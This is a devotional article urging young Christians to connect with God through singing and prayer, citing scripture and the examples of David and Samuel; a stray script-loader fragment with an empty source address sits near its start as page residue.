connecting with God through youthful worship

(function(){ var s = document.createElement('script'); s.src = '//'; document.body.appendChild(s); })();(body) God is a supernatural being or spirit believed to create the whole universe, and all that is in it. He is worshipped all over the world, because of His infinite power, mercy and love upon His creatures. Worshipping God is an act of showing respect for God by saying prayers singing, etc. alone or with other people in a religious building, at home, etc. We connect with God in so many ways through worship, as youths the bible advices that you remember God while you are still young, before those dismal days and years come when you will say, “I don’t enjoy life.” (Eccle 12:1). What does it mean to connect with God? We all have our different ways of connecting with God; it could be through prayer, singing, or even writing articles or notes, etc. when we connect to God we gain access to Him, we are able to talk and speak with Him, we suddenly believe He is close to us, we even get to see Him in our dreams or visions, we get to hear Him when he speaks to us, and so on. What does it mean to connect in worship? We believe that each of us has been created differently and
 connects with God in different ways. But because we are the body of Jesus Christ we are also created to connect with God together publicly or privately. Sunday gatherings are designed to help us draw ourselves closer to God through music, prayer, bible teachings and study, communion, and fellowship. These Sunday gatherings are also the best place where children, teens, and youths, learn how to connect with God at their level and in fun ways. Worship God by singing, praying, confession. It is believed that youths of this present age no longer worship God. Now how do we connect these youths to God through worship? God loves music, especially music from the voice of a youth. Youths too also love music, but worldly music. Music that catches their attention is not the kind of music God loves to hear, and there is no way they can connect with God through that kind of music. Singing is more a matter of our hearts than our voices, so when we sing a song with so much passion, we are showing outwardly how we feel inwardly, or like people would put it we are singing out our hearts. So the first step for youths to connect with God is through singing. Singing in the Bible; there are almost fifty exhortations to sing in the scripture, as well as four hundred references to singing. Ephesians 5:19 says “Speak to one another with the words of psalms, hymns, and sacred songs; sing hymns and psalms to the Lord with praise in your hearts.” Also Colossians 3:16 says “Christ’s message in all its richness must live in your hearts. Teach and instruct each other with all wisdom. Sing psalms, hymns, and sacred songs; sing to God with thanksgiving in your hearts. These two passages instruct us as youths to sing psalms, hymns, and spiritual songs (not worldly and meaningless songs) to God and to one another; these aren’t suggestions, preferences or good ideas. They are commands, which mean God intends for us to obey them. God loves music, and He has given us voices and the gift to sing. He intends that we use this gift to praise Him always. Just like King David in the Bible, during his youth he would always sing praises to God using his harp and God loved him dearly that He made him king. Whenever David committed a sin against God he would sing to Him and God will forgive him, this made God to love him the more. We too can be like David who connected with God through the melodious music he played with his harp. True worshippers sing. Worship is a state of heart, musical sound is a state of art let’s not confuse them. We sing and make melody to the Lord with our heart. For the youths to connect with God through worship, they should be allowed to sing at Sunday gatherings at the church (choir) and partake in every other activity in the church. Partake in morning devotions at school or work, listen to only gospel and meaningful music (spiritual songs) and also sing psalms to God. Not everyone has the gift of singing or can connect with God through singing; most youths connect with God through prayer. Though it is said that “he who sings well prays twice,” but some prefer to pray and meditate, they believe they can connect with God faster that way. Singing and praying work together, so whether you are singing or praying you are still worshipping God. Some youths prefer to just sing, while some would pray or meditate, and some would sing and pray together. God accepts our different ways of worship. For a youth that connects with God only through prayer, he tends to lock himself up in a room and observe his quiet time. At this point he speaks to Jesus who is the only connection to God, he talks to Him like a friend, and he tells Him his ups and downs. He may not be able to hear Jesus speak to him immediately, but he can hear Him through His words In the Holy Book. This is what it feels like to be connected with God in worship. As youths we are advised to create this connection with God through worship, either by singing or praying. So that we get to speak to Him and hear Him when he wants to speak to us, just like Samuel in the Bible. We too can hear God’s voice and even know He’s the one speaking to us, if we try to look for the best way to connect with Him. “Remember God in thy young days,” let’s connect with God through youthful worship.

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